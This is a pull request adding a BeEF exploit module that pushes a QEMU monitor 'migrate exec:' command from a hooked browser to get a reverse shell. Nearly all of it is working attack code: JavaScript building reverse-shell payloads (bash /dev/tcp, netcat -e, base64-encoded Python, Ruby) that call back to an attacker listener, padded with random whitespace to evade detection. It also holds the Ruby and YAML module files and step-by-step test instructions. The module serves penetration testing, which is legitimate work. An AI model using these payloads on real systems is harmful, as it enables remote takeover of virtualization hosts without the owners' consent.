### PR TITLE
Add QEMU Monitor 'migrate' Command Execution module

### DIFF
--- a/modules/exploits/qemu_monitor_migrate_cmd_exec/command.js
+++ b/modules/exploits/qemu_monitor_migrate_cmd_exec/command.js
@@ -1,0 +1,62 @@
+//
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>';
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+  var timeout = 5;
+  var payload_name = '<%= @payload %>';
+  var peer = rhost + ':' + rport;
+
+  payload = function() {
+    var whitespace = '';
+    for (var i=0; i<Math.floor(Math.random()*10)+3; i++) whitespace += ' ';
+    var payload = '';
+    switch (payload_name) {
+      case "reverse_python2":
+        var cmd = "import socket,subprocess,os;host='"+lhost+"';port="+lport+";s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"
+        cmd = cmd.replace(/,/g, whitespace+','+whitespace).replace(/;/g, whitespace+';'+whitespace)
+        var encoded_cmd = btoa(cmd);
+        payload = "/usr/bin/python2 -c \\\"exec ( '" + encoded_cmd + "'.decode ( 'base64' ) )\\\"";
+        payload = payload.replace(/ /g, whitespace);
+        break;
+      case "reverse_netcat":
+        payload = "/bin/nc " + lhost + " " + lport + " -e /bin/sh";
+        payload = payload.replace(/ /g, whitespace);
+        break;
+      case "reverse_ruby":
+        payload = "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\\\"" + lhost + "\\\",\\\"" + lport + "\\\");while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end'"
+        payload = payload.replace(/ /g, whitespace);
+        break;
+      default: // "reverse_bash"
+        payload = "/bin/bash -c '/bin/bash -i >& /dev/tcp/" + lhost + "/" + lport + " 0>&1'";
+        payload = payload.replace(/ /g, whitespace);
+        break;
+    }
+    return 'migrate "exec:' + payload + '"'
+  }
+
+  try {
+    var code = payload();
+    beef.debug("[qemu_monitor_migrate_cmd_exec] " + peer + " - Sending payload (" + code.length + " bytes)");
+    var iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/", code);
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+  } catch(e) {
+    beef.debug("[qemu_monitor_migrate_cmd_exec] " + peer + " - Exploit failed: " + e.message);
+  }
+
+  cleanup = function() {
+    try {
+      document.body.removeChild(iframe_<%= @command_id %>);
+    } catch(e) {
+      beef.debug("[qemu_monitor_migrate_cmd_exec] Could not remove iframe: " + e.message);
+    }
+  } 
+  setTimeout("cleanup()", timeout*1000);
+
+});

--- a/modules/exploits/qemu_monitor_migrate_cmd_exec/config.yaml
+++ b/modules/exploits/qemu_monitor_migrate_cmd_exec/config.yaml
@@ -1,0 +1,15 @@
+#
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        qemu_monitor_migrate_cmd_exec:
+            enable: true
+            category: "Exploits"
+            name: "QEMU Monitor 'migrate' Command Execution"
+            description: "This module attempts to get a reverse shell from <a href='https://www.qemu.org/docs/master/system/monitor.html'>QEMU monitor service</a> (TCP or Telnet) using the 'migrate' command.<br/><br/>Works only if SSL/TLS and authentication are disabled. See: <a href='https://www.qemu.org/docs/master/system/security.html#monitor-console-qmp-and-hmp'>https://www.qemu.org/docs/master/system/security.html</a>."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

--- a/modules/exploits/qemu_monitor_migrate_cmd_exec/module.rb
+++ b/modules/exploits/qemu_monitor_migrate_cmd_exec/module.rb
@@ -1,0 +1,38 @@
+#
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Qemu_monitor_migrate_cmd_exec < BeEF::Core::Command
+
+  def self.options
+    configuration = BeEF::Core::Configuration.instance
+    lhost = configuration.beef_host
+    lhost = "" if lhost == "0.0.0.0"
+
+    return [
+      { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },
+      { 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '' },
+      { 'name' => 'payload',
+        'type' => 'combobox',
+        'ui_label' => 'Payload',
+        'store_type' => 'arraystore',
+        'store_fields' => ['payload'],
+        'store_data' => [ ['reverse_bash'], ['reverse_netcat'], ['reverse_python2'], ['reverse_ruby'] ],
+        'emptyText' => 'Select a payload',
+        'valueField' => 'payload',
+        'displayField' => 'payload',
+        'mode' => 'local',
+        'forceSelection' => 'false',
+        'autoWidth' => true
+      },
+      { 'name' => 'lhost', 'ui_label' => 'Listen Host', 'value' => lhost },
+      { 'name' => 'lport', 'ui_label' => 'Listen Port', 'value' => '8080' }
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end


### PR DESCRIPTION
## Category

Exploit module.

## Description

This module attempts to get a reverse shell from <a href='https://www.qemu.org/docs/master/system/monitor.html'>QEMU monitor service</a> (TCP or Telnet) using the 'migrate' command.<br/><br/>Works only if SSL/TLS and authentication are disabled. See: <a href='https://www.qemu.org/docs/master/system/security.html#monitor-console-qmp-and-hmp'>https://www.qemu.org/docs/master/system/security.html</a>.

## Test

Start a VM (any VM) using QEMU and enable the monitor service with either `telnet:` or `tcp:` on a port of your choosing:

```
-monitor telnet:127.0.0.1:55555,server,nowait -serial mon:stdio
```

```
-monitor tcp:127.0.0.1:55555,server,nowait -serial mon:stdio
```

Open a web browser and hook it with BeEF.

On the BeEF host, start a netcat listener (`nc -lvp 1337`) and select the `QEMU Monitor 'migrate' Command Execution` module, and set the module options.

* Remote host: `127.0.0.1`
* Remote port: `55555` (if using the example commands above)
* Payload: `reverse_bash` (reliable)
* Listen Host: netcat listener host IP address
* Listen Port: netcat listener port

Run the module and review the netcat listener for a shell prompt.
